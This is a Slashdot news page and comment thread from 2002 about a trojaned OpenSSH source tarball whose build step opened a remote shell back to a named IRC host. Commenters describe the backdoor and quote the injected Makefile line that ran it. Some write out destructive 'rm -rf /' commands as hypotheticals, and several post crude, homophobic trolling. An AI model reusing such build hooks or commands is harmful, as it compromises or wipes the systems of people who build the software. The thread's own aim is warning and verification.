Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

OpenSSH Package Trojaned

michael posted more than 12 years ago | from the md5-saves-lives dept.

Security 574

cperciva writes "The original story is here. And more details are available from the guy's weblog here." Here's a mirror of that email message. Another reader writes, "Not really a trojan because all it does is make a connection to 203.62.158.32:6667." Still another writes "The tarball of the portable OpenSSH on ftp.openbsd.org is trojaned. The backdoor is only used during build - generated binaries are fine." There isn't much authoritative information available, but this appears legitimate - please be careful if you're updating any of your machines with code from ftp.openbsd.org, and we'll update this story with more links as information is available. Update: 08/01 19:13 GMT by M : OpenSSH now has an advisory.

cancel ×

574 comments

Sorry! There are no comments related to the filter you selected.

fuck you. (-1, Offtopic)

sinserve (455889) | more than 12 years ago | (#3991141)

First piss.

Trolls (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991143)

All trolls are butt-spelunkers!

OpenBSD is holy! (0, Funny)

Anonymous Coward | more than 12 years ago | (#3991147)

It's official: OpenBSD is holy. The Pope just announced the security hole itself.

Another blow to the *BSD movement, losing the support of Atheists all over the globe...

Or something.

Re:OpenBSD is holy! (1)

lertl (455570) | more than 12 years ago | (#3991302)

This incident is not the fault of OpenBSD. Check their FAQ, www.openbsd.org (and so ftp.openbsd.org) is run on Solaris.

MD5 sums (5, Informative)

cheezycrust (138235) | more than 12 years ago | (#3991154)

From the newsgroup message [freebsd.org] :
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD

ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

j00 R 0wn3d lol (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991158)

Um, what was that you said about open source security being SO superior?

This has never happened to a Microsoft product. Although I am sure the Slashdot crew of janitors and peons would have a field day if it did.

All I can say is, j00 R 0wn3d lol

Re: Ummm... actually it has (0)

Anonymous Coward | more than 12 years ago | (#3991237)

Actually this has happened to numerous microsoft apps. Not the least of which is Windows XP, which allows M$ to backdoor you whenever they please.

RTFM man, and stop being such a microsoft junkie. Microsoft has it's place but doesn't deserve a pedistal. Flat out, it sucks.

203.62.158.32 (1)

bsDaemon (87307) | more than 12 years ago | (#3991160)

But...they don't have enough h4x0r green to be evil. Besides, why does it connect to the ircd port?

Re:203.62.158.32 (3, Insightful)

CrazyDuke (529195) | more than 12 years ago | (#3991200)

Packet kiddies like to have their zombies join an irc channel so they can tell the bots to ddos by just typeing something like "!flood 127.0.0.1."

I dunno if thats what this one does though.

Re:203.62.158.32 (2, Informative)

jorleif (447241) | more than 12 years ago | (#3991214)

From the weblog:

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get M, it will spawn a shell

I guess this answers your question

Re:203.62.158.32 (1)

Dark Lord Seth (584963) | more than 12 years ago | (#3991246)

[14:20:15] *** Connecting to 203.62.158.32 (6667)
-
[14:20:17] *** Unable to connect (Connection refused)


[root@Server root]# nmap -sS -p 6667 203.62.158.32

Starting nmap V. 2.54BETA37 ( www.insecure.org/nmap/ )
The 1 scanned port on snsonline.net (203.62.158.32) is: closed

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds


I fail to see what's the use of this "trojan". It doesn't make sense for a script kiddie to try to connect to a closed port on a legitimate looking machine.

Re:203.62.158.32 (2, Insightful)

jorleif (447241) | more than 12 years ago | (#3991259)

Except if the port was closed recently when this whole thing came out?

Re:203.62.158.32 (5, Interesting)

Anonymous Coward | more than 12 years ago | (#3991299)

The machine was rebuilt from source and rebooted within an hour of finding out. It was pure luck that the person that found it asked me to look at the code, at which point I realised it was my ip.

Cheers,

^Sarge^

hmmm.... (4, Funny)

reaper20 (23396) | more than 12 years ago | (#3991161)

So the sources are bad but the binaries are good? Is today bizarro-world day or something?

Re:hmmm.... (4, Funny)

Chester K (145560) | more than 12 years ago | (#3991184)

So the sources are bad but the binaries are good? Is today bizarro-world day or something?

This is yet another example of why everyone should use proprietary closed source software! I bet nobody's ever been compromised through a trojan horse in the build process of Microsoft Word!

Re:hmmm.... (1)

archen (447353) | more than 12 years ago | (#3991254)

The jokes on you, MS Word IS the trojan! The payload is the insane fees they charge for office now that there's virtually no competition...

Re:hmmm.... (1)

Y Ddraig Goch (596795) | more than 12 years ago | (#3991283)

Maybe not during the build, but what about the security holes in Word? If you have an office full of MS Office Automation stuff and then disable the ability to run VBA code in Office what's the point? I'll stick with Open Source, the few holes there are get plugged much faster than with shrink wrapped software.

Re:hmmm.... (4, Informative)

ndecker (588441) | more than 12 years ago | (#3991223)

The trojan executes itself from the Makefile. It compiles a daemon that tries to contact 203.62.158.32 on port 6667 and offers a remote shell for the user compiling the package. After that all files involved are removed and the makefile changed to the original one. The compilied ssh should contain anything from ( this ??? ) trojan.

Further reading [freebsd.org]

Gentoo... (1)

Bush_man10 (461952) | more than 12 years ago | (#3991293)

I wonder what what would happen if someone was installing Gentoo? :) Shitty deal if you ask me

Since its only a build issue... (2, Interesting)

LT4Ryan (178006) | more than 12 years ago | (#3991163)

Why not unplug your box from the network while building? After that it should be OK, seeing as how 'generated binaries are fine.'??

Or am I thinking far too simply for my own good again? :)

Re:Since its only a build issue... (0)

Anonymous Coward | more than 12 years ago | (#3991192)

Hmm.. in /usr/ports on BSD, there is a huge tree of Makefiles, most of which are nothing but a huge list of ftp-urls. 'Building' in BSD terms, is more like 'downloading and building' in Linux terms, so unplugging your box during a build is not such a good idea most of the time..

Re:Since its only a build issue... (3, Informative)

Fluffy the Cat (29157) | more than 12 years ago | (#3991206)

Or just edit openbsd-compat/Makefile.in and remove the line

@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

The backdoor code will still be there, but it won't be built. Or, alternatively, just wait for it to be fixed. Since the SSH binaries themselves aren't affected by this, binary packages from your distribution vendor should be fine.

Irony (0, Flamebait)

Dark Lord Seth (584963) | more than 12 years ago | (#3991165)

OpenBSD being focussed on security and all...

Re:Irony (1)

JyB (132690) | more than 12 years ago | (#3991231)

This as nothing to do with OpenBSD, the trojaned package is hosted on a SUNsite, running Solaris.

Re:Irony (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3991232)

Oh shut up, it's more secure than any amusement-inspiring shit you run.

Re:Irony (1)

yatest5 (455123) | more than 12 years ago | (#3991243)

Oh shut up, it's more secure than any amusement-inspiring shit you run.

Ooh, someone's rattle has just been thrown out of their pram....

Slashdot Effect (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991167)

slashdot effect n.

1. Also spelled "/. effect"; what is said to have happened when taco's anus is virtually unreachable because too many shirt-lifters are hitting it after he posts a boring pro-lunix article on the popular Slashdot news service. The term is quite widely used by /. readers, including variants like "Oh my god, my asshole has been slashdotted again!"

2. In a perhaps inevitable generation, the term is being used to describe any similar effect from being butt-fucked by a large admiring crowd. This would better be described as a flash crowd.

FREE NELSON MANDELA

I'm suprised... (2, Insightful)

DJPenguin (17736) | more than 12 years ago | (#3991168)

...that this doesn't happen more often.

People keep harping on about how open source software means that they can trust downloaded source code, but who actually reads through to source code for something before they actually compile?

Usually it's just ./configure && make && make install.

James

Re:I'm suprised... (1)

rozza (449963) | more than 12 years ago | (#3991201)

Yep. Someone could just put an rm -rf / in the make install:(

Re:I'm suprised... (0)

Anonymous Coward | more than 12 years ago | (#3991204)

Not true, I sometimes scroll thru the readme file

Re:I'm suprised... (4, Interesting)

Queuetue (156269) | more than 12 years ago | (#3991217)

This shows why I trust OS peer-reviewed code... It only takes one curious person to find an exploit, and OSS allows that person to be anyone. This one was found in 6 hours, by someone who wasn't on the OpenBSD team or the OpenSSH team.

It's also why I spend (some say waste) a few idle cycles now and again just perusing code - it only takes one person to notice an anomaly. The more aggregate cycles spent reviewing code, the better the systems get.

Re:I'm suprised... (0)

Anonymous Coward | more than 12 years ago | (#3991247)

Few people, but few is > none... If anything, this is a case in point - the trojan was found!

Who knows what MS or other proprietary vendors are putting on your machine. This is particularly important outside the USA, where a trojanned Windows would be a major security risk to western european nations, who are increasingly being forced to consider the USA a hostile "rogue state" - only the USA is huge...

Re:I'm suprised... (1)

tps12 (105590) | more than 12 years ago | (#3991272)

I have considered this problem before. Basically, the time it takes to absorb the meaning of a project from its source code appears to be proportional to the square of the size of the code. This varies somewhat depending on the cleanliness of your design, but is a good rule of thumb.

What that means is, things the size of OpenOffice or Linux or Emacs require a huge time investment to even reach the point where you could spot these kinds of exploits or bugs.

So what's the solution? There are a few. One would be the creation of a business that audits code. They would maintain a database of "approved" code, and users would pay them small subscription fees and get all their code through them. If a user wants something not available in the database, he can submit the code for auditting and be notified when it passes.

Another solution would be a program that utilizes AI algorithms to look through other programs' source code. It would need to identify what a program is supposed to do, and then flag anything that does not contribute to its intended result. It would also need to look out for common exploitable errors, like buffer overflows. You'd Have to Be Truly brilliant to pull off a trojan like this with such a system in place. I wonder why something like this hasn't been written!

Re:I'm suprised... (0)

Anonymous Coward | more than 12 years ago | (#3991304)


Another solution would be a program that utilizes AI algorithms to look through other programs' source code. It would need to identify what a program is supposed to do, and then flag anything that does not contribute to its intended result. It would also need to look out for common exploitable errors, like buffer overflows. You'd Have to Be Truly brilliant to pull off a trojan like this with such a system in place. I wonder why something like this hasn't been written!

Yeah, me too, especially given all the humanlike AI programs available on Sourceforge. Damn lazy open source programmers -- hop to it!

Re:I'm suprised... (0)

Anonymous Coward | more than 12 years ago | (#3991294)

Actually, it does happen more often. irssi [irssi.org] , the popular IRC client, was recently backdoored in the same way.

This wouldn't have happend if it was JAVA (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991173)

We should all switch to a code-signed world.

Re:This wouldn't have happend if it was JAVA (1)

zero_offset (200586) | more than 12 years ago | (#3991276)

Ha. Java code-signing is just an afterthought.

COM components (aka ActiveX) via CAB files had better code-signing. And before you whine and bitch, it was the browser-side implementation that sucked. The signing was pretty rock-solid.

.NET has even better code authentication mechanisms.

But I bow to your basic argument. :)

Re:This wouldn't have happend if it was JAVA (0)

Anonymous Coward | more than 12 years ago | (#3991286)

JAVA

You mean Java?

Ha ha (-1)

RTFA Man (578488) | more than 12 years ago | (#3991174)

so much for that hallowed never-had-a-hole-in-default-install crap. OpenBSD is owned. Bitches.

Thats funny (0, Redundant)

yatest5 (455123) | more than 12 years ago | (#3991175)

I thought all viruses were caused by MS Outlook?

Virus != Trojan (1)

Gekko (45112) | more than 12 years ago | (#3991216)

I know your trying to be funny (or a troll), but Trojan is not a virus. A Virus can leave a trojan, or a trojan can leave access to a virus but they are not the same.

Oh my!!! (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3991178)

Windows software doesn't have problems like this!

Wake up, Bill won the game.

Losers!

Re:Oh my!!! (0)

Anonymous Coward | more than 12 years ago | (#3991253)

Me thinks Bill gave a good part of his working force some time off today, so that they could stroll over to /. and unload their hatred upon a unsuspecting crowd of bewildered /.'ers who believed that OpenBsd could never be hacked. Shit happens, SNAFU. At least I(as a linux-user)don't have to agree to an EULA that *gives* legal rights to Micro$hit to have full control over my box. But hey, rant all you want, it's not every day *this* happens!

BTW, and if I did not mentioned it, the OS of BSOD's is so full of bugs and shit, my head spins just thinking about it; and I try every day to forget the days of horror when it was my profession to work with this piece of crap. General Protection Error, my ass!

Security, Antisecurity and a Purposeless Anecdote (4, Interesting)

f00Dave (251755) | more than 12 years ago | (#3991180)

On the one hand, there's stories about the improved security and paranoia [slashdot.org] of OpenSSH.

And on the other hand, there's stories like this one and that [slashdot.org] one about anti-security "features" in the same package.

Now, my question is this: is this indicative of open-source development projects, in general? [Yeah, it's faster to fix issues, but if the distros are *causing* issues in the first place, well.... ;-) ]

Reminds me of a company I worked for that was timebombed by a previous programmer. Unfortunately for him, when we looked at the source code, all was well (he'd copied the sources back over his modified ones used in the binary build) ... but he'd left the .bak files. Guess what was in the .bak files. Good, now guess how we discovered a few other potential surprises he'd left for the rest of us to encounter.

Anyway, I can't see how a disgruntled coder could really affect an open-source project, unless there's personality factors at play that I don't know about. Anyone have some meat on this OpenSSL mess?

suggestion: changing the main ftp openbsd site (2)

kipple (244681) | more than 12 years ago | (#3991181)

wouldn't be better to change the 'main' openbsd site to be one of its current mirror?
I suppose that a mirror has better chances to be managed with motivation and skill, surely more than a solaris box in a university actually has.

also, the mirror should run openbsd itself...

Re:suggestion: changing the main ftp openbsd site (0)

Anonymous Coward | more than 12 years ago | (#3991226)

http://www.openbsd.org/faq/faq8.html#wwwsolaris [openbsd.org]

pony up the money, cowboy.

How many people do check the MD5 checksum? (3, Insightful)

frleong (241095) | more than 12 years ago | (#3991182)

Do you check the packages downloaded from sites that you usually do not have problems with? Like from redhat.com, debian.org and in this case openbsd.org?

Also, how many people do read the makefiles before running them on your machine? And when installing binaries require root access?

If this story is really true, how much safer is open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover that they are trojan or not.

Re:How many people do check the MD5 checksum? (5, Informative)

GigsVT (208848) | more than 12 years ago | (#3991205)

The guy caught it because of the installer automatically checking the MD5 checksum. Someone would have to explicitely ignore the MD5 error to be hit by this.

The same is true of other systems like the Red Hat Network.

Re:How many people do check the MD5 checksum? (2)

norwoodites (226775) | more than 12 years ago | (#3991270)

except where on most OS (unlike most BSD) there is no port system where it checks the MD5 unless you do it by hand by then they could have changed the one on the ftp server also.

The port system includes MD5 sums when you download the port system or checkout it from cvs.

Re:How many people do check the MD5 checksum? (2, Informative)

GigsVT (208848) | more than 12 years ago | (#3991300)

except where on most OS (unlike most BSD) there is no port system where it checks the MD5 unless you do it by hand by then they could have changed the one on the ftp server also.

I don't know what OS you are talking about. Debian apt automatically [debian.org] checks MD5sums, Red Hat network uses cryptographic certificates to verify package integrity, even Windows has a package verification system.

Re:How many people do check the MD5 checksum? (4, Interesting)

stevey (64018) | more than 12 years ago | (#3991236)

Do you check the packages downloaded from sites that you usually do not have problems with?

I've been wondering about this - and the answer is almost certainly not.

I've written a fairly widespread mp3/ogg streamer [gnump3d.org] . I used to list MD5 sums on the download page - but recently I've switched to signing with my GPG key.

(On the basis that if somebody altered the downloads they'd be capable of fixing up the MD5sums file in the same directory too).

Taking a look at the download statistics [sourceforge.net] you can see that about 1 person in 50 downloaded the signature file to match their archive.

That suggests that 2% of people routinely check signatures. I assume that less people check the code than check the signatures so ... it's probably safe to say that no more than 0.5% of people do.

Re:How many people do check the MD5 checksum? (3, Interesting)

zmooc (33175) | more than 12 years ago | (#3991240)

What we need is a trusted 3rd party that has all the checksums. It should not be possible to change the keys without a GPG-signed message (or something similar) from the package-maintainer. Package-download-software should then automatically check the MD5-sum on the TTP server. Does anybody know if such service exists or if there are plans to set this up?

Re:How many people do check the MD5 checksum? (5, Interesting)

Quixote (154172) | more than 12 years ago | (#3991292)

Thats what I was thinking, too.
We can model something along the lines of DNS, and have the download/build process do a 'lookup' on (say) openssh-3.4p1.packages.net, to get the MD5 sum, and compare it with whats on hand.

Never underestimate the power of a bunch of pissed-off nerds... :)

Re:How many people do check the MD5 checksum? (1)

Queuetue (156269) | more than 12 years ago | (#3991241)

Do you check the packages downloaded from sites that you usually do not have problems with? Like from redhat.com, debian.org and in this case openbsd.org?

Of course I do! You don't?

If this story is really true, how much safer is open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover that they are trojan or not.

Well, this one was caught in 6 hours by someone who wasn't on the OpenSSH or the OpenBSD teams. I'd imagine if he was asleep at the switch, I believe someone else would have found it soon after.

Re:How many people do check the MD5 checksum? (1)

Lemuel (2370) | more than 12 years ago | (#3991257)

I never check the MD5 checksum because I figure that if someone can crack the file they can replace the checksum. Having said that, I understand that the checksum and file may be in different locations, but often they are not. It would probably still make sense to check, though. An MD5 mismatch would be meaningful even if a match may not be.

Re:How many people do check the MD5 checksum? (2, Insightful)

maxwell demon (590494) | more than 12 years ago | (#3991311)

Well, the problem with the md5 checksum is that it only protects against download errors, not against replacement at the server (unless you have an independent source for that checksum): It's trivial to calculate the checksum for the changed package, and if you manage to replace the package file, you most probably manage to replace the file with the md5 key as well.

The only way to really secure against such replacements is to use public-key cryptography to sign the package. Then no one can recreate the signature without having the private key.

Maybe for installing, a safer way would be to give the user account temporarily access to the destination directories, then install as a user, and finally change owner permissions by hand. Of course this won't work if installation consists of more than just copying files to other directories, and this extra stuff needs root permissions. However, I guess that's rare.

Checksum...? (5, Interesting)

DJPenguin (17736) | more than 12 years ago | (#3991183)

OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?

Re:Checksum...? (1)

Roofus (15591) | more than 12 years ago | (#3991220)

OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?

The checksums were already on the users FreeBSD machine.

This is another victory for Open Source!!! (1, Funny)

Anonymous Coward | more than 12 years ago | (#3991185)

Isn't it?

Idle curiosity (3, Informative)

Glytch (4881) | more than 12 years ago | (#3991186)

So, does apt-get use checksums and gpg signatures these days? Or are there thousands of debian machines out there just begging to be owned?

Re:Idle curiosity (4, Informative)

reeve (216640) | more than 12 years ago | (#3991296)

Yes, apt-get uses MD5 checksums, and I'm not sure about gpg signs but Debian's build system uses them to check the sources.

Trojan (5, Interesting)

GigsVT (208848) | more than 12 years ago | (#3991188)

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.

Tell me how this isn't a trojan again? A remotely controllable program that could possibly give the attacker root access?

Re:Trojan (0)

Anonymous Coward | more than 12 years ago | (#3991256)

IP Address 203.62.158.32 resolves to:
OEMCOMPUTER


HAHAHAHAHAHAHAHAHAHHAHAHAAHA

Result of the Reverse Lookup
IP address Result
203.62.158.32 snsonline.net [more info for this domain name]

Re:Trojan (1, Insightful)

Anonymous Coward | more than 12 years ago | (#3991277)

Tell me how this isn't a trojan again?

It is a trojan, like the article title says. It's a completely independent program that a user is tricked into running on his own box that does something other than that user expects.

Quality control and open source (0)

Anonymous Coward | more than 12 years ago | (#3991191)

This is interesting. Open source developers are great, and we appreciate their contributions, but shouldn't there be some sort of open source code review? I understand that people that download the packages have the option to review the code, but I'm sure there's a lot that don't. Shouldn't some sort of change control/QC process be implemented before something is put up for the public's use?

Re:Quality control and open source (0)

Anonymous Coward | more than 12 years ago | (#3991285)

Hush, you heretic! the next thing we know, you'll be asking for (gasp!) a _warranty_ !!

It wasn't orgianally like that. (5, Informative)

Neon Spiral Injector (21234) | more than 12 years ago | (#3991193)

I got my copy of the OpenSSH source from ftp.openssh.org the day it was released, and mine doesn't contain the bf-test.c file and the MD5 checksum is correct.

So if the file was modified it happen later.

Re:It wasn't orgianally like that. (5, Informative)

Fluffy the Cat (29157) | more than 12 years ago | (#3991227)

So if the file was modified it happen later.

The datestamp on the modified file was Jul 31, so it does look like it's been changed recently.

Re:It wasn't orgianally like that. (1)

Sibeling (597639) | more than 12 years ago | (#3991301)

It's rumored to be only in Portable releases of openssh. Hence the p1 in 3.4p1. An interesting read is the thread it created on the FreeBSD list [freebsd.org]

Another reason.. (0)

prisen (578061) | more than 12 years ago | (#3991194)

to subscribe to Bugtraq [securityfocus.com] or a similar security mailing list. Especially you guys that run any type of server. Securityfocus [securityfocus.com] is your friend; they'll have these advisories far in advance of any other place on the net.

what's up with OpenBSD? (0, Troll)

tps12 (105590) | more than 12 years ago | (#3991209)

I don't mean to be making a "*BSD is Dying" post, but what's the deal? This is the second problem with OpenSSH in a few months, and OpenSSL was exploited just a few days ago.

Is OpenBSD in trouble? More importantly, what are security-conscious people switching to, now that OpenBSD is no longer the fortress it once was?

Re:what's up with OpenBSD? (1)

JyB (132690) | more than 12 years ago | (#3991244)

This has nothing to do with *BSD.

A package was trojaned on a SUNsite. Where's BSD in this ?

BTW, OpenSSL has nothing to do with *BSD. And the bug in OpenSSH was ... well ... shit happens, it's still humans who are coding ...

Re:what's up with OpenBSD? (0)

Anonymous Coward | more than 12 years ago | (#3991245)

OpenSSL is a completely seperate project that OpenBSD (and just about every other vendor) happens to bundle.

Re:what's up with OpenBSD? (0)

Anonymous Coward | more than 12 years ago | (#3991282)

Just because "Open" is in the name of "OpenSSL", you automaticly assume the OpenBSD people are the same people behind OpenSSL? That's not the case.

And why is OpenBSD in trouble? If you think OpenBSD is in trouble because of the bugs in Apache en OpenSSH, then I can assume you think RedHat is in a shitload of trouble (compare errata pages).

There are always bugs, and there always will be. Where software gets written, bugs are made. It's just that some OS developers (like the OpenBSD developers) tend to spend more time searching for those bugs than others.

Re:what's up with OpenBSD? (1)

Militant (26707) | more than 12 years ago | (#3991312)

I am security conscious... and I am sticking with OpenBSD. It is still a strongly fortified OS. All of this software is secondary to the core OS.

OpenSSL is outside of OpenBSD, and has nothing to do with them. Everyone got affected the same.

They found the first remote exploit to affect OpenSSH in a long time (years) recently. Most people weren't affected. Ironically, it was OpenBSDs extra secure defaults that were vulnerable. Shit happens. The community was quick to patch their systems. Is Linux dying because it can be raped every week?

It appears the trojan was inserted after the initial release. So someone may have broken into the server. I believe the server is at the University of Calgary. Not Theo De Raadt's basement.

Why don't we wait to find out what happened? I guarantee this isn't being taken lightly.

Thanks

Re:what's up with OpenBSD? (2, Interesting)

Mercaptan (257186) | more than 12 years ago | (#3991313)

It's not in any trouble at all.

OpenBSD is less of a fortress and more of a flexible defense. In this case, even though the integrity of the centralized source code was compromised, any end-user who accessed it via the ports tree was immediately tipped off that something wasn't kosher. They could then communicate this to other users and the maintainers of OpenBSD and thus make this attack known to the public within hours of it happening. And due to the ease of updating that the ports tree provides, the maintainers of OpenBSD can correct this problem very quickly. This sort of suppleness provides for the best kind of broadband defense, whereas a "fortress" cannot brook much weakness in any of its parts and is far more brittle. Had users not been able to see the disparity (via MD5 sums), or not been able to communicate it to their fellow users, or not have been able to easily obtain a clean copy, then the problem may have been easily transmitted to a large number of operating OpenBSD machines. As it was, the problem got nipped at the bud.

This event would be the sort of reason why security-conscious people should stick with OpenBSD.

Trojan executes code read via /bin/sh (3, Informative)

XTaran (70498) | more than 12 years ago | (#3991211)

Not really a trojan because all it does is make a connection to 203.62.158.32:6667

But it reads from the connection and executes the read code via /bin/sh. You call this not a trojan?

Trojaned source distributions (5, Interesting)

dzym (544085) | more than 12 years ago | (#3991218)

So far we've seen dsniff and other programs from monkey.org trojaned [linuxsecurity.com] , irssi [irssi.org] , BitchX [securityfocus.com] , and now OpenSSH.

At this point I think we need to make the assumption that the problem is a bit more common than viewing these compromises individually would suggest, and perhaps these individual events can even be linked together.

And for the developers out there, I think it's time to check over all of your current distributed source tarballs.

How to stop this happening again? (1)

uchian (454825) | more than 12 years ago | (#3991221)

This is the one area with open source which I am suprised has not been exploited earlier, and it's a problem I'm not sure how can be avoided.

We see that the "many eyes" on open source seems to work pretty damn quickly : but the question is, how much damage could someone do in the time it takes for people to notice? Most software needs to be installed as root, and most people blindly install software without checking the make files to see what they do. Because it is run as root, you are leaving your machine wide open to anything the trojan wants to do.

yes | rm -r /

The trouble is, a normal virus checker wouldn't be any use against this kind of trojan as most damage is caused before the trojan is noticed.

Has anyone else thought about ways to solve this problem?

Re:How to stop this happening again? (0, Troll)

yatest5 (455123) | more than 12 years ago | (#3991233)

Has anyone else thought about ways to solve this problem?

Buy software produced by professionals?

Re:How to stop this happening again? (0)

Anonymous Coward | more than 12 years ago | (#3991275)

Buy software produced by professionals?

Yeah, and I suppose you say 'microsoft' is a professional?

Re:How to stop this happening again? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991255)

hey douchebag, howabout you show everyone you have the lamest idea of what unix is.. oh wait, you did.

rm -rf /

would be better suited to your needs.

move along, nothing to see here.

Re:How to stop this happening again? (0)

Anonymous Coward | more than 12 years ago | (#3991266)

It's MORE of a problem with closed-source. At least with open-source, you have some chance of discovering the trojan - the US government could be right now using undisclosed backdoors and trojans in closed-source packages for industrial espionage against western europe. They've done it before.

Re:How to stop this happening again? (1)

ndecker (588441) | more than 12 years ago | (#3991289)

Has anyone else thought about ways to solve this problem?

I think there are types of solutions:

  • Technical: with ACLs and capabilities, it should be possible to restrict the damage that could be done by an installer. It might allow the installer to change the files belonging to the package and disallow any daemons running after the install and any network connections.

    These technical measures will provide some protection from simple attacks, but the attacker will know these measures too. There will be ways to bypass them.

  • Social: Every package could be signed by some person. This signature could be checked on install. The problem is, that there are very few people trusted by everyone. These people probably couldn't check every update to every free package. If there are more, non-prominent "signers", it could be possible for some bad person to be considered trusted.

Re:How to stop this happening again? (2, Insightful)

tburkhol (121842) | more than 12 years ago | (#3991306)

Has anyone else thought about ways to solve this problem?

Check MD5 sums

make -n

Unplug from the net and log all traffic while you compile, install and test. Check the log.

Don't unpack a tarball within 48 hours of its creation...let someone else find the problems.

Be one of the "many eyes" and actually learn some of the source code.

OpenSSH (5, Informative)

Anonymous Coward | more than 12 years ago | (#3991228)

The trojan is executing during BUILD ONLY. The trojan attempts to connected to an unknown daemon on 203.62.158.32:6667 (system reinstalled now and even more secured - thanks for that, ^Sarge^), and awaited one out of three characters for a command from the server it connected to - M, A and D.

M respawned the process.
A killed the trojan.
D launched /bin/sh.

With the D command, as given _to_ the trojan, the daemon on 203:62.158.32:6667 was given control of the trojaned users system shell. As most people, unfortunally, decide to compile as root, this potentially could have given the hacker a large amount of root shells around the globe with little or no hazzle.

Funny, this is. Expect more trojans that look like this, but in a better disguise. :-/

-- Hans.

Bill Gates, laughing (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991229)

Seems like if anyone ever actually bothered to hack the Linux kernel, it would be a security nightmare.

I guess since Linux only has 0.005% of the market share, nobody even cares enough to write a virus for it.

Either way, looks like this is the final nail in the Linux coffin. I guess y'all won't be bragging about security anymore.

looks like it's from our australian friends (1, Interesting)

Anonymous Coward | more than 12 years ago | (#3991230)

inetnum 203.62.158.0 - 203.62.159.255
netname AUSTRALIANINTER-AU
descr Australian Internet Solutions Pty Ltd
descr Suite 3, Level 5, 277 Flinders Lane
descr Melbourne
descr VIC 3001
country AU
admin-c DA53-AP
tech-c DA53-AP
mnt-by MAINT-AU-KALED
changed register@aunic.net 19970211
changed aunic-transfer@apnic.net 20010525
changed hostmaster@apnic.net 20011115
source APNIC

person Domain Administrator
address Level 4,
address 180 Bourke St,
address Melbourne, 3000.
country AU
phone +61-3-9650-5566
fax-no +61-3-9639-1897
e-mail kaled@dalek.ains.net.au
nic-hdl DA53-AP
mnt-by MAINT-NEW
changed kaled@dalek.ains.net.au 20010619
source APNIC

Re:looks like it's from our australian friends (2)

dzym (544085) | more than 12 years ago | (#3991252)

That ip address means nothing. Having something so publicly visible in your artwork would be like signing the graffiti you just sprayed all over the base of the statue of liberty with your real name and leaving a phone number.

It's definitely going to be just another 0wn3d box like with the BitchX source ./configure trojan.

it is confirmed: Theo de Raadt is dying (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991235)

It is now official. Slashdot confirms: Theo de Raadt is dying.

One more crippling bombshell hit the already beleaguered *BSD community when Slashdot confirmed that confidence in OpenBSD security has dropped yet again, with OpenBSD down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Slashdot article which plainly states that OpenSSH has more holes than a default IIS install, this news serves to reinforce what we've known all along. Theo de Raadt is collapsing in complete disarray, and industry pundits believe he will soon fall dead.

You don't need to be Jordan Hubbard to predict de Raadt's future. The hand writing is on the wall: Theo faces a bleak future. In fact there won't be any future at all for Theo because Theo is dying. Things are looking very bad for Theo. As many of us are already aware, Theo continues to lose credibility. Red ink flows like a river of blood.

Let's keep to the facts and look at the numbers. OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many exploits have there been to OpenBSD since Theo started coming clean about its failings? At least two remote root vulnerabilities in the last month. If we extrapolate that to two undisclosed exploits per month for the last six years OpenBSD has claimed to be free of holes, that's 144 security holes in 7000 machines, or 1,008,000 potential break-ins to an OpenBSD machine.

All major surveys show that Theo de Raadt is too arrogant to be able to live through this embarrassment. Theo is very sick and his long term survival prospects are very dim. If Theo is to survive at all it will only be through spending another 6 years covering up all the holes in OpenBSD. But the word is out, and nothing short of a miracle could save him at this point in time. For all practical purposes, Theo is dead.

Fact: Theo de Raadt is dying.

Re:it is confirmed: Theo de Raadt is dying (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991278)

Err, mods on crack.. what is offtopic about Theo de Raadt on an article about a security hole in OpenBSD? Please fix the moderation, someone.

What's the big worry (5, Funny)

back@slash (176564) | more than 12 years ago | (#3991248)

C:\>bf-output.sh
'bf-output.sh' is not recognized as an internal or external command,
operable program or batch file


This trojan doesn't look very 31337 to me.

Re:What's the big worry (0)

Anonymous Coward | more than 12 years ago | (#3991290)

My shell said "Bad Command or File Name."

Healthy versions still available..? (2, Informative)

virve (63803) | more than 12 years ago | (#3991262)

One of the Paris mirrors seems to have a "healthy" version - if one dares believe the info on checksums.

juan:~> md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4b a8a8 openssh-3.4p1.tar.gz

ftp://ftp.fr.openbsd.org/pub/OpenBSD/OpenSSH/por ta ble/openssh-3.4p1.tar.gz

Dit it make into any distro? (1)

